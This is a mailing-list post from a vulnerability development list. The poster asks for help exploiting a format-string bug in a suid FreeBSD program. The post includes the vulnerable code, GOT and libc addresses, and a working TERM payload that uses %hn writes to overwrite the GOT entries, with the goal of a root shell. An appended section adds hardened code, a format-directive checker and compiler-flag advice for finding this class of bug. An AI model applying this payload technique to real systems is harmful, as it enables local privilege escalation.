Vulnerability Development mailing list archives
Format Strings nonexec heap/stack
From: Alex <alex00882007 () gmail com>
Date: Sun, 30 Jan 2005 01:04:43 -0500
Hello, this is my first post. I hope it's in the right list. I am posting to get some help in developing an exploit for such a condition.

The environment: FreeBSD machine, non-exec heap/stack. This is a suid binary, but it is not calling setuid().

    /* the vulnerable program from the post, with the includes and the
     * return type it was missing; printf(ptr) is the bug under discussion */
    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
        char *ptr;

        ptr = getenv("TERM");
        if (ptr)
            printf(ptr);    /* user-controlled format string */
        printf("\n");
        exit(0);
    }

    objdump -R | grep printf
    0804999c R_386_JUMP_SLOT   printf

    objdump -R | grep exit
    080499b0 R_386_JUMP_SLOT   exit

    (gdb) p setuid
    $1 = {<text variable, no debug info>} 0x280c1370 <setuid>
    (gdb) p system
    $2 = {<text variable, no debug info>} 0x28093a38 <system>

Using a format string it is possible to overwrite the GOT entries for printf() and exit(). I have been able to do so successfully. The problem is that it is not enough to do just that, since it will become system("\n") or system(0); on FreeBSD, arguments are passed via pushing to the stack.

What I have been trying to do is this. After rewriting the GOT entry for printf as that of setuid(), I want to push a NULL byte onto the stack to call setuid(0); the GOT entry for exit() has been replaced by that of system(). So instead of pushing 0x0, I want to push a pointer to a "/bin/sh" string. Is this possible even? Or is there a better way of doing this?

To overwrite the GOT:

    export TERM=`printf "\x9c\x99\x04\x08\x9e\x99\x04\x08\xb0\x99\x04\x08\xb2\x99\x04\x08"`%.4960u%OFFSET\$hn%.5276u%OFFSET+1\$hn%.9628u%OFFSET+2\$hn%.60881u%OFFSET+3\$hn

where OFFSET = stackpop(?). Usually this is ~130 but it depends on how your environment variables are set up.

I'm not sure what I would do next in order to change the values that are being pushed. Could someone help me with this?
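For readers coming to this thread from the defensive side, here is an added example that is not part of Alex's post: the printf(ptr) call from the program above beside its hardened form, plus a small check that counts the conversion directives in an untrusted string before it reaches a legacy printf() call. The function names (count_format_directives, render_untrusted) and the sample TERM value are my own.

```c
/* Added example, not from the original post: the hardened counterpart of
 * the post's printf(ptr), and a check for untrusted values that are about
 * to be handed to a printf-family function. Names are invented here. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Counts conversion directives in an untrusted string: every '%' that is
 * not immediately followed by another '%'. "%%" is an escaped literal and
 * does not count. A non-zero result means the string would steer printf()
 * if it were ever used as the format argument. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* "%%" prints a single '%' */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

/* Hardened form of the post's printf(ptr): the untrusted text is passed as
 * an argument to a fixed format, so any "%n" or "%x" inside it is printed
 * literally instead of being interpreted. Rendered into a caller-supplied
 * buffer so the result can be inspected; returns the number of bytes
 * stored (excluding the NUL), or -1 on an encoding error. */
int render_untrusted(const char *untrusted, char *out, size_t outlen)
{
    int r = snprintf(out, outlen, "%s\n", untrusted);
    if (r < 0)
        return -1;
    /* snprintf reports the length it wanted; clamp to what actually fit */
    return r < (int)outlen ? r : (int)outlen - 1;
}

int main(void)
{
    /* Constructed sample: a TERM value in the style of the post's payload,
     * with directives that a vulnerable printf(ptr) would act on. */
    const char *sample = "xterm%08x%n";
    char buf[128];

    int directives = count_format_directives(sample);
    int written = render_untrusted(sample, buf, sizeof buf);

    /* buf is an argument here, never the format, so it prints verbatim */
    printf("directives found: %d, bytes rendered: %d\nrendered: %s",
           directives, written, buf);
    return directives ? 1 : 0;
}
```

The check is what a reviewer would run over environment-sourced strings in a suid program; the real fix is the one render_untrusted() shows, a fixed format with the untrusted text as an argument (or fputs()). GCC's -Wformat -Wformat-security flags a printf(ptr) call with no format arguments at compile time, which is the cheapest way to find this class of bug in a tree.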
Current thread:
- Format Strings nonexec heap/stack Alex (Jan 30)